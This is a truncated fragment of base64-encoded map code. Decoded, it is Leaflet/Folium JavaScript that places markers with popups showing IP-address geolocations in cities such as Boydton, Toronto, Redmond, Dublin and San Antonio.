N0eWxlPSJ3aWR0aDogMTAwLjAlOyBoZWlnaHQ6IDEwMC4wJTsiPkNvdW50cnlDb2RlPVVTLCBDb3VudHJ5TmFtZT1Vbml0ZWQgU3RhdGVzLCBTdGF0ZT1WaXJnaW5pYSwgQ2l0eT1Cb3lkdG9uLCBMb25naXR1ZGU9LTc4LjM3NSwgTGF0aXR1ZGU9MzYuNjUzNCwgVHlwZT1nZW9sb2NhdGlvbjxicj5JUDogNDAuNzcuMjI4LjY5PC9kaXY+YClbMF07CiAgICAgICAgICAgIHBvcHVwX2VhOWQ1OWE0NTU0ZjRmNDU5YTljODE5YjFhMWMyOGY2LnNldENvbnRlbnQoaHRtbF9iMjA2ZDc2OGQwNGU0MDQwOWFiZjJlNjU0YTZlMWY0Nyk7CiAgICAgICAgCgogICAgICAgIG1hcmtlcl8yMTE1NWNjODE5NDc0ZTY4OWNiNjYyY2Q2ZjliYmM4Zi5iaW5kUG9wdXAocG9wdXBfZWE5ZDU5YTQ1NTRmNGY0NTlhOWM4MTliMWExYzI4ZjYpCiAgICAgICAgOwoKICAgICAgICAKICAgIAogICAgCiAgICAgICAgICAgIG1hcmtlcl8yMTE1NWNjODE5NDc0ZTY4OWNiNjYyY2Q2ZjliYmM4Zi5iaW5kVG9vbHRpcCgKICAgICAgICAgICAgICAgIGA8ZGl2PgogICAgICAgICAgICAgICAgICAgICBCb3lkdG9uLCBVbml0ZWQgU3RhdGVzCiAgICAgICAgICAgICAgICAgPC9kaXY+YCwKICAgICAgICAgICAgICAgIHsic3RpY2t5IjogdHJ1ZX0KICAgICAgICAgICAgKTsKICAgICAgICAKICAgIAogICAgICAgICAgICB2YXIgbWFya2VyXzFhYzRhOTAyYzY5ZTQwNDM4MzMxNmEwZjI3MTg3ZGViID0gTC5tYXJrZXIoCiAgICAgICAgICAgICAgICBbNDMuNjY0NCwgLTc5LjQxOTVdLAogICAgICAgICAgICAgICAge30KICAgICAgICAgICAgKS5hZGRUbyhtYXBfMjNjNmJmYTBlY2ZkNDY3MjliZGE0OTE3ZTZmMWM4MWMpOwogICAgICAgIAogICAgCiAgICAgICAgICAgIHZhciBpY29uXzFiMzFlOTgxMTlkMDQ4MWJhMTNjOWYyZTRkNzFlMGVhID0gTC5Bd2Vzb21lTWFya2Vycy5pY29uKAogICAgICAgICAgICAgICAgeyJleHRyYUNsYXNzZXMiOiAiZmEtcm90YXRlLTAiLCAiaWNvbiI6ICJpbmZvLXNpZ24iLCAiaWNvbkNvbG9yIjogIndoaXRlIiwgIm1hcmtlckNvbG9yIjogImJsdWUiLCAicHJlZml4IjogImdseXBoaWNvbiJ9CiAgICAgICAgICAgICk7CiAgICAgICAgICAgIG1hcmtlcl8xYWM0YTkwMmM2OWU0MDQzODMzMTZhMGYyNzE4N2RlYi5zZXRJY29uKGljb25fMWIzMWU5ODExOWQwNDgxYmExM2M5ZjJlNGQ3MWUwZWEpOwogICAgICAgIAogICAgCiAgICAgICAgdmFyIHBvcHVwXzg1YzBjZDI4OTMwMTRjODRiMjg2YTI2N2RlY2ZiZDE1ID0gTC5wb3B1cCh7Im1heFdpZHRoIjogIjEwMCUifSk7CgogICAgICAgIAogICAgICAgICAgICB2YXIgaHRtbF8xNWFjMjJhY2U2ZDI0ZTk4ODUwNTI5NWJkNTFhYzM3MiA9ICQoYDxkaXYgaWQ9Imh0bWxfMTVhYzIyYWNlNmQyNGU5ODg1MDUyOTViZDUxYWMzNzIiIHN0eWxlPSJ3aWR0aDogMTAwLjAlOyBoZWlnaHQ6IDEwMC4wJTsiPkNvdW50cnlDb2RlPUNBLCBDb3VudHJ5TmFtZT1DYW5hZGEsIFN0YXRlPU9udGFyaW8sIENpdHk9VG9yb250bywgTG9uZ2l0dWRlPS03OS40MTk1LCBMYXRpdHVkZT00My42NjQ0LCBUeXBlPWdlb2xvY2F0aW9uPGJyPklQOiA0MC44NS4yMzIuNjQ8L2Rpdj5gKVswXTsKICAgICAgICAgICAgcG9wdXBfODVjMGNkMjg5MzAxNGM4NGIyODZhMjY3ZGVjZmJkMTUuc2V0Q29udGVudChodG1sXzE1YWMyMmFjZTZkMjRlOTg4NTA1Mjk1YmQ1MWFjMzcyKTsKICAgICAgICAKCiAgICAgICAgbWFya2VyXzFhYzRhOTAyYzY5ZTQwNDM4MzMxNmEwZjI3MTg3ZGViLmJpbmRQb3B1cChwb3B1cF84NWMwY2QyODkzMDE0Yzg0YjI4NmEyNjdkZWNmYmQxNSkKICAgICAgICA7CgogICAgICAgIAogICAgCiAgICAKICAgICAgICAgICAgbWFya2VyXzFhYzRhOTAyYzY5ZTQwNDM4MzMxNmEwZjI3MTg3ZGViLmJpbmRUb29sdGlwKAogICAgICAgICAgICAgICAgYDxkaXY+CiAgICAgICAgICAgICAgICAgICAgIFRvcm9udG8sIENhbmFkYQogICAgICAgICAgICAgICAgIDwvZGl2PmAsCiAgICAgICAgICAgICAgICB7InN0aWNreSI6IHRydWV9CiAgICAgICAgICAgICk7CiAgICAgICAgCiAgICAKICAgICAgICAgICAgdmFyIG1hcmtlcl9mYjExYTcyNjFmNGY0ZGE0YTgzNmMxNTJmYzIyYzI3NyA9IEwubWFya2VyKAogICAgICAgICAgICAgICAgWzM4LjcwOTUsIC03OC4xNTM5XSwKICAgICAgICAgICAgICAgIHt9CiAgICAgICAgICAgICkuYWRkVG8obWFwXzIzYzZiZmEwZWNmZDQ2NzI5YmRhNDkxN2U2ZjFjODFjKTsKICAgICAgICAKICAgIAogICAgICAgICAgICB2YXIgaWNvbl8wYTc2MjJmOGQxZmI0MWM1YjA4Njc3NzA4Yjg0OTQxMSA9IEwuQXdlc29tZU1hcmtlcnMuaWNvbigKICAgICAgICAgICAgICAgIHsiZXh0cmFDbGFzc2VzIjogImZhLXJvdGF0ZS0wIiwgImljb24iOiAiaW5mby1zaWduIiwgImljb25Db2xvciI6ICJ3aGl0ZSIsICJtYXJrZXJDb2xvciI6ICJibHVlIiwgInByZWZpeCI6ICJnbHlwaGljb24ifQogICAgICAgICAgICApOwogICAgICAgICAgICBtYXJrZXJfZmIxMWE3MjYxZjRmNGRhNGE4MzZjMTUyZmMyMmMyNzcuc2V0SWNvbihpY29uXzBhNzYyMmY4ZDFmYjQxYzViMDg2Nzc3MDhiODQ5NDExKTsKICAgICAgICAKICAgIAogICAgICAgIHZhciBwb3B1cF9kZGVhODk3YjdkMjU0YzhkYWFjYTYzNDQ1ZmEzZjU5YiA9IEwucG9wdXAoeyJtYXhXaWR0aCI6ICIxMDAlIn0pOwoKICAgICAgICAKICAgICAgICAgICAgdmFyIGh0bWxfOWRjOWM5OTNiMmVmNDg0M2IzODVlYjJlYWZjM2QxOTIgPSAkKGA8ZGl2IGlkPSJodG1sXzlkYzljOTkzYjJlZjQ4NDNiMzg1ZWIyZWFmYzNkMTkyIiBzdHlsZT0id2lkdGg6IDEwMC4wJTsgaGVpZ2h0OiAxMDAuMCU7Ij5Db3VudHJ5Q29kZT1VUywgQ291bnRyeU5hbWU9VW5pdGVkIFN0YXRlcywgU3RhdGU9VmlyZ2luaWEsIENpdHk9V2FzaGluZ3RvbiwgTG9uZ2l0dWRlPS03OC4xNTM5LCBMYXRpdHVkZT0zOC43MDk1LCBUeXBlPWdlb2xvY2F0aW9uPGJyPklQOiAyMC4zOC45OC4xMDA8L2Rpdj5gKVswXTsKICAgICAgICAgICAgcG9wdXBfZGRlYTg5N2I3ZDI1NGM4ZGFhY2E2MzQ0NWZhM2Y1OWIuc2V0Q29udGVudChodG1sXzlkYzljOTkzYjJlZjQ4NDNiMzg1ZWIyZWFmYzNkMTkyKTsKICAgICAgICAKCiAgICAgICAgbWFya2VyX2ZiMTFhNzI2MWY0ZjRkYTRhODM2YzE1MmZjMjJjMjc3LmJpbmRQb3B1cChwb3B1cF9kZGVhODk3YjdkMjU0YzhkYWFjYTYzNDQ1ZmEzZjU5YikKICAgICAgICA7CgogICAgICAgIAogICAgCiAgICAKICAgICAgICAgICAgbWFya2VyX2ZiMTFhNzI2MWY0ZjRkYTRhODM2YzE1MmZjMjJjMjc3LmJpbmRUb29sdGlwKAogICAgICAgICAgICAgICAgYDxkaXY+CiAgICAgICAgICAgICAgICAgICAgIFdhc2hpbmd0b24sIFVuaXRlZCBTdGF0ZXMKICAgICAgICAgICAgICAgICA8L2Rpdj5gLAogICAgICAgICAgICAgICAgeyJzdGlja3kiOiB0cnVlfQogICAgICAgICAgICApOwogICAgICAgIAogICAgCiAgICAgICAgICAgIHZhciBtYXJrZXJfMGY5NTNkM2RhNmJmNDRhNzg1YjA0OTQ3MGM0NWQ5ZDggPSBMLm1hcmtlcigKICAgICAgICAgICAgICAgIFszOC43MDk1LCAtNzguMTUzOV0sCiAgICAgICAgICAgICAgICB7fQogICAgICAgICAgICApLmFkZFRvKG1hcF8yM2M2YmZhMGVjZmQ0NjcyOWJkYTQ5MTdlNmYxYzgxYyk7CiAgICAgICAgCiAgICAKICAgICAgICAgICAgdmFyIGljb25fM2M3OTM1YmE5ZTJjNDE1NGFiZjc5NzhiMWQwNjRmYmMgPSBMLkF3ZXNvbWVNYXJrZXJzLmljb24oCiAgICAgICAgICAgICAgICB7ImV4dHJhQ2xhc3NlcyI6ICJmYS1yb3RhdGUtMCIsICJpY29uIjogImluZm8tc2lnbiIsICJpY29uQ29sb3IiOiAid2hpdGUiLCAibWFya2VyQ29sb3IiOiAiYmx1ZSIsICJwcmVmaXgiOiAiZ2x5cGhpY29uIn0KICAgICAgICAgICAgKTsKICAgICAgICAgICAgbWFya2VyXzBmOTUzZDNkYTZiZjQ0YTc4NWIwNDk0NzBjNDVkOWQ4LnNldEljb24oaWNvbl8zYzc5MzViYTllMmM0MTU0YWJmNzk3OGIxZDA2NGZiYyk7CiAgICAgICAgCiAgICAKICAgICAgICB2YXIgcG9wdXBfZTNiNGQ5MTNmZGU2NDkyYThhZGI4OTRiMjIzODc0OTMgPSBMLnBvcHVwKHsibWF4V2lkdGgiOiAiMTAwJSJ9KTsKCiAgICAgICAgCiAgICAgICAgICAgIHZhciBodG1sXzdlOThlODFiM2QzZjRmODRhMjMwNDkxNjE4MTM5ZDUyID0gJChgPGRpdiBpZD0iaHRtbF83ZTk4ZTgxYjNkM2Y0Zjg0YTIzMDQ5MTYxODEzOWQ1MiIgc3R5bGU9IndpZHRoOiAxMDAuMCU7IGhlaWdodDogMTAwLjAlOyI+Q291bnRyeUNvZGU9VVMsIENvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMsIFN0YXRlPVZpcmdpbmlhLCBDaXR5PVdhc2hpbmd0b24sIExvbmdpdHVkZT0tNzguMTUzOSwgTGF0aXR1ZGU9MzguNzA5NSwgVHlwZT1nZW9sb2NhdGlvbjxicj5JUDogMjMuOTYuNjQuODQ8L2Rpdj5gKVswXTsKICAgICAgICAgICAgcG9wdXBfZTNiNGQ5MTNmZGU2NDkyYThhZGI4OTRiMjIzODc0OTMuc2V0Q29udGVudChodG1sXzdlOThlODFiM2QzZjRmODRhMjMwNDkxNjE4MTM5ZDUyKTsKICAgICAgICAKCiAgICAgICAgbWFya2VyXzBmOTUzZDNkYTZiZjQ0YTc4NWIwNDk0NzBjNDVkOWQ4LmJpbmRQb3B1cChwb3B1cF9lM2I0ZDkxM2ZkZTY0OTJhOGFkYjg5NGIyMjM4NzQ5MykKICAgICAgICA7CgogICAgICAgIAogICAgCiAgICAKICAgICAgICAgICAgbWFya2VyXzBmOTUzZDNkYTZiZjQ0YTc4NWIwNDk0NzBjNDVkOWQ4LmJpbmRUb29sdGlwKAogICAgICAgICAgICAgICAgYDxkaXY+CiAgICAgICAgICAgICAgICAgICAgIFdhc2hpbmd0b24sIFVuaXRlZCBTdGF0ZXMKICAgICAgICAgICAgICAgICA8L2Rpdj5gLAogICAgICAgICAgICAgICAgeyJzdGlja3kiOiB0cnVlfQogICAgICAgICAgICApOwogICAgICAgIAogICAgCiAgICAgICAgICAgIHZhciBtYXJrZXJfNzJmNDVhMTU1NDQxNDA5Mjg3YzhiNDU3YTJhYjhmZGYgPSBMLm1hcmtlcigKICAgICAgICAgICAgICAgIFszNi42NTM0LCAtNzguMzc1XSwKICAgICAgICAgICAgICAgIHt9CiAgICAgICAgICAgICkuYWRkVG8obWFwXzIzYzZiZmEwZWNmZDQ2NzI5YmRhNDkxN2U2ZjFjODFjKTsKICAgICAgICAKICAgIAogICAgICAgICAgICB2YXIgaWNvbl9kMTZkODZiNDk4NDk0NjM2YjhjZmE5OTNlZDZjNjAwYiA9IEwuQXdlc29tZU1hcmtlcnMuaWNvbigKICAgICAgICAgICAgICAgIHsiZXh0cmFDbGFzc2VzIjogImZhLXJvdGF0ZS0wIiwgImljb24iOiAiaW5mby1zaWduIiwgImljb25Db2xvciI6ICJ3aGl0ZSIsICJtYXJrZXJDb2xvciI6ICJibHVlIiwgInByZWZpeCI6ICJnbHlwaGljb24ifQogICAgICAgICAgICApOwogICAgICAgICAgICBtYXJrZXJfNzJmNDVhMTU1NDQxNDA5Mjg3YzhiNDU3YTJhYjhmZGYuc2V0SWNvbihpY29uX2QxNmQ4NmI0OTg0OTQ2MzZiOGNmYTk5M2VkNmM2MDBiKTsKICAgICAgICAKICAgIAogICAgICAgIHZhciBwb3B1cF82YTNmZGY5ZjZiNjk0MjliOWRlYjg4ODJjNmUyNzk2NyA9IEwucG9wdXAoeyJtYXhXaWR0aCI6ICIxMDAlIn0pOwoKICAgICAgICAKICAgICAgICAgICAgdmFyIGh0bWxfY2FhMzUwY2FmMWIzNDg2MmFhMjNhNjkyOWU3YmQzNWQgPSAkKGA8ZGl2IGlkPSJodG1sX2NhYTM1MGNhZjFiMzQ4NjJhYTIzYTY5MjllN2JkMzVkIiBzdHlsZT0id2lkdGg6IDEwMC4wJTsgaGVpZ2h0OiAxMDAuMCU7Ij5Db3VudHJ5Q29kZT1VUywgQ291bnRyeU5hbWU9VW5pdGVkIFN0YXRlcywgU3RhdGU9VmlyZ2luaWEsIENpdHk9Qm95ZHRvbiwgTG9uZ2l0dWRlPS03OC4zNzUsIExhdGl0dWRlPTM2LjY1MzQsIFR5cGU9Z2VvbG9jYXRpb248YnI+SVA6IDY1LjU1LjQ0LjEwODwvZGl2PmApWzBdOwogICAgICAgICAgICBwb3B1cF82YTNmZGY5ZjZiNjk0MjliOWRlYjg4ODJjNmUyNzk2Ny5zZXRDb250ZW50KGh0bWxfY2FhMzUwY2FmMWIzNDg2MmFhMjNhNjkyOWU3YmQzNWQpOwogICAgICAgIAoKICAgICAgICBtYXJrZXJfNzJmNDVhMTU1NDQxNDA5Mjg3YzhiNDU3YTJhYjhmZGYuYmluZFBvcHVwKHBvcHVwXzZhM2ZkZjlmNmI2OTQyOWI5ZGViODg4MmM2ZTI3OTY3KQogICAgICAgIDsKCiAgICAgICAgCiAgICAKICAgIAogICAgICAgICAgICBtYXJrZXJfNzJmNDVhMTU1NDQxNDA5Mjg3YzhiNDU3YTJhYjhmZGYuYmluZFRvb2x0aXAoCiAgICAgICAgICAgICAgICBgPGRpdj4KICAgICAgICAgICAgICAgICAgICAgQm95ZHRvbiwgVW5pdGVkIFN0YXRlcwogICAgICAgICAgICAgICAgIDwvZGl2PmAsCiAgICAgICAgICAgICAgICB7InN0aWNreSI6IHRydWV9CiAgICAgICAgICAgICk7CiAgICAgICAgCiAgICAKICAgICAgICAgICAgdmFyIG1hcmtlcl8zNTUwYjQ0N2RhOWI0YzE4OTdiMzRiZDk1YzEyYTA4YiA9IEwubWFya2VyKAogICAgICAgICAgICAgICAgWzQ3LjY3NDIsIC0xMjIuMTI0M10sCiAgICAgICAgICAgICAgICB7fQogICAgICAgICAgICApLmFkZFRvKG1hcF8yM2M2YmZhMGVjZmQ0NjcyOWJkYTQ5MTdlNmYxYzgxYyk7CiAgICAgICAgCiAgICAKICAgICAgICAgICAgdmFyIGljb25fYTZmY2VkZjdjMTdiNGExNGIyZDdkNDg2OTNhNjJlZDUgPSBMLkF3ZXNvbWVNYXJrZXJzLmljb24oCiAgICAgICAgICAgICAgICB7ImV4dHJhQ2xhc3NlcyI6ICJmYS1yb3RhdGUtMCIsICJpY29uIjogImluZm8tc2lnbiIsICJpY29uQ29sb3IiOiAid2hpdGUiLCAibWFya2VyQ29sb3IiOiAiYmx1ZSIsICJwcmVmaXgiOiAiZ2x5cGhpY29uIn0KICAgICAgICAgICAgKTsKICAgICAgICAgICAgbWFya2VyXzM1NTBiNDQ3ZGE5YjRjMTg5N2IzNGJkOTVjMTJhMDhiLnNldEljb24oaWNvbl9hNmZjZWRmN2MxN2I0YTE0YjJkN2Q0ODY5M2E2MmVkNSk7CiAgICAgICAgCiAgICAKICAgICAgICB2YXIgcG9wdXBfYWNlOGQxY2M2OTAyNGZkNDk0OWMxYzBhYjk3OGJjZTYgPSBMLnBvcHVwKHsibWF4V2lkdGgiOiAiMTAwJSJ9KTsKCiAgICAgICAgCiAgICAgICAgICAgIHZhciBodG1sX2E3ZjkwOGIzZTJmNTQ2YTM4MzJkY2Q0Zjk3MDFmMGEwID0gJChgPGRpdiBpZD0iaHRtbF9hN2Y5MDhiM2UyZjU0NmEzODMyZGNkNGY5NzAxZjBhMCIgc3R5bGU9IndpZHRoOiAxMDAuMCU7IGhlaWdodDogMTAwLjAlOyI+Q291bnRyeUNvZGU9VVMsIENvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMsIFN0YXRlPVdhc2hpbmd0b24sIENpdHk9UmVkbW9uZCwgTG9uZ2l0dWRlPS0xMjIuMTI0MywgTGF0aXR1ZGU9NDcuNjc0MiwgVHlwZT1nZW9sb2NhdGlvbjxicj5JUDogMTMxLjEwNy4xNDcuMjA5PC9kaXY+YClbMF07CiAgICAgICAgICAgIHBvcHVwX2FjZThkMWNjNjkwMjRmZDQ5NDljMWMwYWI5NzhiY2U2LnNldENvbnRlbnQoaHRtbF9hN2Y5MDhiM2UyZjU0NmEzODMyZGNkNGY5NzAxZjBhMCk7CiAgICAgICAgCgogICAgICAgIG1hcmtlcl8zNTUwYjQ0N2RhOWI0YzE4OTdiMzRiZDk1YzEyYTA4Yi5iaW5kUG9wdXAocG9wdXBfYWNlOGQxY2M2OTAyNGZkNDk0OWMxYzBhYjk3OGJjZTYpCiAgICAgICAgOwoKICAgICAgICAKICAgIAogICAgCiAgICAgICAgICAgIG1hcmtlcl8zNTUwYjQ0N2RhOWI0YzE4OTdiMzRiZDk1YzEyYTA4Yi5iaW5kVG9vbHRpcCgKICAgICAgICAgICAgICAgIGA8ZGl2PgogICAgICAgICAgICAgICAgICAgICBSZWRtb25kLCBVbml0ZWQgU3RhdGVzCiAgICAgICAgICAgICAgICAgPC9kaXY+YCwKICAgICAgICAgICAgICAgIHsic3RpY2t5IjogdHJ1ZX0KICAgICAgICAgICAgKTsKICAgICAgICAKICAgIAogICAgICAgICAgICB2YXIgbWFya2VyXzExYzM2YmZmZmUzMTRiZDRiOTY4MzEwN2MyMmY1MWEwID0gTC5tYXJrZXIoCiAgICAgICAgICAgICAgICBbMzguNzA5NSwgLTc4LjE1MzldLAogICAgICAgICAgICAgICAge30KICAgICAgICAgICAgKS5hZGRUbyhtYXBfMjNjNmJmYTBlY2ZkNDY3MjliZGE0OTE3ZTZmMWM4MWMpOwogICAgICAgIAogICAgCiAgICAgICAgICAgIHZhciBpY29uX2I0MDQ1MTExNDgwYjQ4MzhhMjNjNzZjMTE1OWI4MTBhID0gTC5Bd2Vzb21lTWFya2Vycy5pY29uKAogICAgICAgICAgICAgICAgeyJleHRyYUNsYXNzZXMiOiAiZmEtcm90YXRlLTAiLCAiaWNvbiI6ICJpbmZvLXNpZ24iLCAiaWNvbkNvbG9yIjogIndoaXRlIiwgIm1hcmtlckNvbG9yIjogImJsdWUiLCAicHJlZml4IjogImdseXBoaWNvbiJ9CiAgICAgICAgICAgICk7CiAgICAgICAgICAgIG1hcmtlcl8xMWMzNmJmZmZlMzE0YmQ0Yjk2ODMxMDdjMjJmNTFhMC5zZXRJY29uKGljb25fYjQwNDUxMTE0ODBiNDgzOGEyM2M3NmMxMTU5YjgxMGEpOwogICAgICAgIAogICAgCiAgICAgICAgdmFyIHBvcHVwXzI2NDA4ZmJkYWRiYTQxYzM5Mzg5MTliNmEyMjdkOTJhID0gTC5wb3B1cCh7Im1heFdpZHRoIjogIjEwMCUifSk7CgogICAgICAgIAogICAgICAgICAgICB2YXIgaHRtbF84NWM0MDNiNTU1YjQ0ZjljYjQ4NGQwODc0YTRiYTdmZCA9ICQoYDxkaXYgaWQ9Imh0bWxfODVjNDAzYjU1NWI0NGY5Y2I0ODRkMDg3NGE0YmE3ZmQiIHN0eWxlPSJ3aWR0aDogMTAwLjAlOyBoZWlnaHQ6IDEwMC4wJTsiPkNvdW50cnlDb2RlPVVTLCBDb3VudHJ5TmFtZT1Vbml0ZWQgU3RhdGVzLCBTdGF0ZT1WaXJnaW5pYSwgQ2l0eT1XYXNoaW5ndG9uLCBMb25naXR1ZGU9LTc4LjE1MzksIExhdGl0dWRlPTM4LjcwOTUsIFR5cGU9Z2VvbG9jYXRpb248YnI+SVA6IDEzLjgyLjE1Mi40ODwvZGl2PmApWzBdOwogICAgICAgICAgICBwb3B1cF8yNjQwOGZiZGFkYmE0MWMzOTM4OTE5YjZhMjI3ZDkyYS5zZXRDb250ZW50KGh0bWxfODVjNDAzYjU1NWI0NGY5Y2I0ODRkMDg3NGE0YmE3ZmQpOwogICAgICAgIAoKICAgICAgICBtYXJrZXJfMTFjMzZiZmZmZTMxNGJkNGI5NjgzMTA3YzIyZjUxYTAuYmluZFBvcHVwKHBvcHVwXzI2NDA4ZmJkYWRiYTQxYzM5Mzg5MTliNmEyMjdkOTJhKQogICAgICAgIDsKCiAgICAgICAgCiAgICAKICAgIAogICAgICAgICAgICBtYXJrZXJfMTFjMzZiZmZmZTMxNGJkNGI5NjgzMTA3YzIyZjUxYTAuYmluZFRvb2x0aXAoCiAgICAgICAgICAgICAgICBgPGRpdj4KICAgICAgICAgICAgICAgICAgICAgV2FzaGluZ3RvbiwgVW5pdGVkIFN0YXRlcwogICAgICAgICAgICAgICAgIDwvZGl2PmAsCiAgICAgICAgICAgICAgICB7InN0aWNreSI6IHRydWV9CiAgICAgICAgICAgICk7CiAgICAgICAgCiAgICAKICAgICAgICAgICAgdmFyIG1hcmtlcl81Mzc0NTRlMzAxNzY0NTdlOGJkMWU1NmI2ODQyZjZlZSA9IEwubWFya2VyKAogICAgICAgICAgICAgICAgWzUzLjMzMzgsIC02LjI0ODhdLAogICAgICAgICAgICAgICAge30KICAgICAgICAgICAgKS5hZGRUbyhtYXBfMjNjNmJmYTBlY2ZkNDY3MjliZGE0OTE3ZTZmMWM4MWMpOwogICAgICAgIAogICAgCiAgICAgICAgICAgIHZhciBpY29uX2FlNGYwNmNjNGNiNjRjYzM5ZDRjN2ExYjkzZDU0MjU2ID0gTC5Bd2Vzb21lTWFya2Vycy5pY29uKAogICAgICAgICAgICAgICAgeyJleHRyYUNsYXNzZXMiOiAiZmEtcm90YXRlLTAiLCAiaWNvbiI6ICJpbmZvLXNpZ24iLCAiaWNvbkNvbG9yIjogIndoaXRlIiwgIm1hcmtlckNvbG9yIjogImJsdWUiLCAicHJlZml4IjogImdseXBoaWNvbiJ9CiAgICAgICAgICAgICk7CiAgICAgICAgICAgIG1hcmtlcl81Mzc0NTRlMzAxNzY0NTdlOGJkMWU1NmI2ODQyZjZlZS5zZXRJY29uKGljb25fYWU0ZjA2Y2M0Y2I2NGNjMzlkNGM3YTFiOTNkNTQyNTYpOwogICAgICAgIAogICAgCiAgICAgICAgdmFyIHBvcHVwXzljNzZhMWNhNmU3YjRmZDE4YzgwNGE4MzQ3YTczZTQ4ID0gTC5wb3B1cCh7Im1heFdpZHRoIjogIjEwMCUifSk7CgogICAgICAgIAogICAgICAgICAgICB2YXIgaHRtbF9mMDljNGJlZGNjMzQ0NDM0YTgwZjJlNzUzMzQxYTcyYyA9ICQoYDxkaXYgaWQ9Imh0bWxfZjA5YzRiZWRjYzM0NDQzNGE4MGYyZTc1MzM0MWE3MmMiIHN0eWxlPSJ3aWR0aDogMTAwLjAlOyBoZWlnaHQ6IDEwMC4wJTsiPkNvdW50cnlDb2RlPUlFLCBDb3VudHJ5TmFtZT1JcmVsYW5kLCBTdGF0ZT1MZWluc3RlciwgQ2l0eT1EdWJsaW4sIExvbmdpdHVkZT0tNi4yNDg4LCBMYXRpdHVkZT01My4zMzM4LCBUeXBlPWdlb2xvY2F0aW9uPGJyPklQOiA0MC43Ny4yMjYuMjUwPC9kaXY+YClbMF07CiAgICAgICAgICAgIHBvcHVwXzljNzZhMWNhNmU3YjRmZDE4YzgwNGE4MzQ3YTczZTQ4LnNldENvbnRlbnQoaHRtbF9mMDljNGJlZGNjMzQ0NDM0YTgwZjJlNzUzMzQxYTcyYyk7CiAgICAgICAgCgogICAgICAgIG1hcmtlcl81Mzc0NTRlMzAxNzY0NTdlOGJkMWU1NmI2ODQyZjZlZS5iaW5kUG9wdXAocG9wdXBfOWM3NmExY2E2ZTdiNGZkMThjODA0YTgzNDdhNzNlNDgpCiAgICAgICAgOwoKICAgICAgICAKICAgIAogICAgCiAgICAgICAgICAgIG1hcmtlcl81Mzc0NTRlMzAxNzY0NTdlOGJkMWU1NmI2ODQyZjZlZS5iaW5kVG9vbHRpcCgKICAgICAgICAgICAgICAgIGA8ZGl2PgogICAgICAgICAgICAgICAgICAgICBEdWJsaW4sIElyZWxhbmQKICAgICAgICAgICAgICAgICA8L2Rpdj5gLAogICAgICAgICAgICAgICAgeyJzdGlja3kiOiB0cnVlfQogICAgICAgICAgICApOwogICAgICAgIAogICAgCiAgICAgICAgICAgIHZhciBtYXJrZXJfYWY0ZWM3MGNkZDFjNGQ3YjkyODMzODdiMzU0M2M3YjcgPSBMLm1hcmtlcigKICAgICAgICAgICAgICAgIFsyOS40MjQ3LCAtOTguNDkzNV0sCiAgICAgICAgICAgICAgICB7fQogICAgICAgICAgICApLmFkZFRvKG1hcF8yM2M2YmZhMGVjZmQ0NjcyOWJkYTQ5MTdlNmYxYzgxYyk7CiAgICAgICAgCiAgICAKICAgICAgICAgICAgdmFyIGljb25fZDg4OGY4OTJmNzQ3NGJiOGE3MWY1NWJjNWRiNjI1Y2MgPSBMLkF3ZXNvbWVNYXJrZXJzLmljb24oCiAgICAgICAgICAgICAgICB7ImV4dHJhQ2xhc3NlcyI6ICJmYS1yb3RhdGUtMCIsICJpY29uIjogImluZm8tc2lnbiIsICJpY29uQ29sb3IiOiAid2hpdGUiLCAibWFya2VyQ29sb3IiOiAiYmx1ZSIsICJwcmVmaXgiOiAiZ2x5cGhpY29uIn0KICAgICAgICAgICAgKTsKICAgICAgICAgICAgbWFya2VyX2FmNGVjNzBjZGQxYzRkN2I5MjgzMzg3YjM1NDNjN2I3LnNldEljb24oaWNvbl9kODg4Zjg5MmY3NDc0YmI4YTcxZjU1YmM1ZGI2MjVjYyk7CiAgICAgICAgCiAgICAKICAgICAgICB2YXIgcG9wdXBfMTZjYzA5NTc3YWU3NGM4MThhZDNmYTk1MGI3Y2I1N2IgPSBMLnBvcHVwKHsibWF4V2lkdGgiOiAiMTAwJSJ9KTsKCiAgICAgICAgCiAgICAgICAgICAgIHZhciBodG1sXzRjZDM1Nzg0NjAxZjRmMDg5ODNlNTAxNzI5ZWY4NmFiID0gJChgPGRpdiBpZD0iaHRtbF80Y2QzNTc4NDYwMWY0ZjA4OTgzZTUwMTcyOWVmODZhYiIgc3R5bGU9IndpZHRoOiAxMDAuMCU7IGhlaWdodDogMTAwLjAlOyI+Q291bnRyeUNvZGU9VVMsIENvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMsIFN0YXRlPVRleGFzLCBDaXR5PVNhbiBBbnRvbmlvLCBMb25naXR1ZGU9LTk4LjQ5MzUsIExhdGl0dWRlPTI5LjQyNDcsIFR5cGU9Z2VvbG9jYXRpb248YnI+SVA6IDEzLjY1LjEwNy4zMjwvZGl2PmApWzBdOwogICAgICAgICAgICBwb3B1cF8xNmNjMDk1NzdhZTc0YzgxOGFkM2ZhOTUwYjdjYjU3Yi5zZXRDb250ZW50KGh0bWxfNGNkMzU3ODQ2MDFmNGYwODk4M2U1MDE3MjllZjg2YWIpOwogICAgICAgIAoKICAgICAgICBtYXJrZXJfYWY0ZWM3MGNkZDFjNGQ3YjkyODMzODdiMzU0M2M3YjcuYmluZFBvcHVwKHBvcHVwXzE2Y2MwOTU3N2FlNzRjODE4YWQzZmE5NTBiN2NiNTdiKQogICAgICAgIDsKCiAgICAgICAgCiAgICAKICAgIAogICAgICAgICAgICBtYXJrZXJfYWY0ZWM3MGNkZDFjNGQ3YjkyODMzODdiMzU0M2M3YjcuYmluZFRvb2x0aXAoCiAgICAgICAgICAgICAgICBgPGRpdj4KICAgICAgICAgICAgICAgICAgICAgU2FuIEFudG9uaW8sIFVuaXRlZCBTdGF0ZXMKICAgICAgICAgICAgICAgICA8L2Rpdj5gLAogICAgICAgICAgICAgICAgeyJzdGlja3kiOiB0cnVlfQogICAgICAgICAgICApOwogICAgICAgIAogICAgCiAgICAgICAgICAgIHZhciBtYXJrZXJfZjA0MGRlMjZjMzc0NDVmZjhiYWM4OTllODBhYmExNWMgPSBMLm1hcmtlcigKICAgICAgICAgICAgICAgIFs0MS42MDA2LCAtOTMuNjExMl0sCiAgICAgICAgICAgICAgICB7fQogICAgICAgICAgICApLmFkZFRvKG1hcF8yM2M2YmZhMGVjZmQ0NjcyOWJkYTQ5MTdlNmYxYzgxYyk7CiAgICAgICAgCiAgICAKICAgICAgICAgICAgdmFyIGljb25fMzYxZmJiNTBlOWQ3NDQ3MWFhMWM5ZmQ0YTM1ZDgzZGMgPSBMLkF3ZXNvbWVNYXJrZXJzL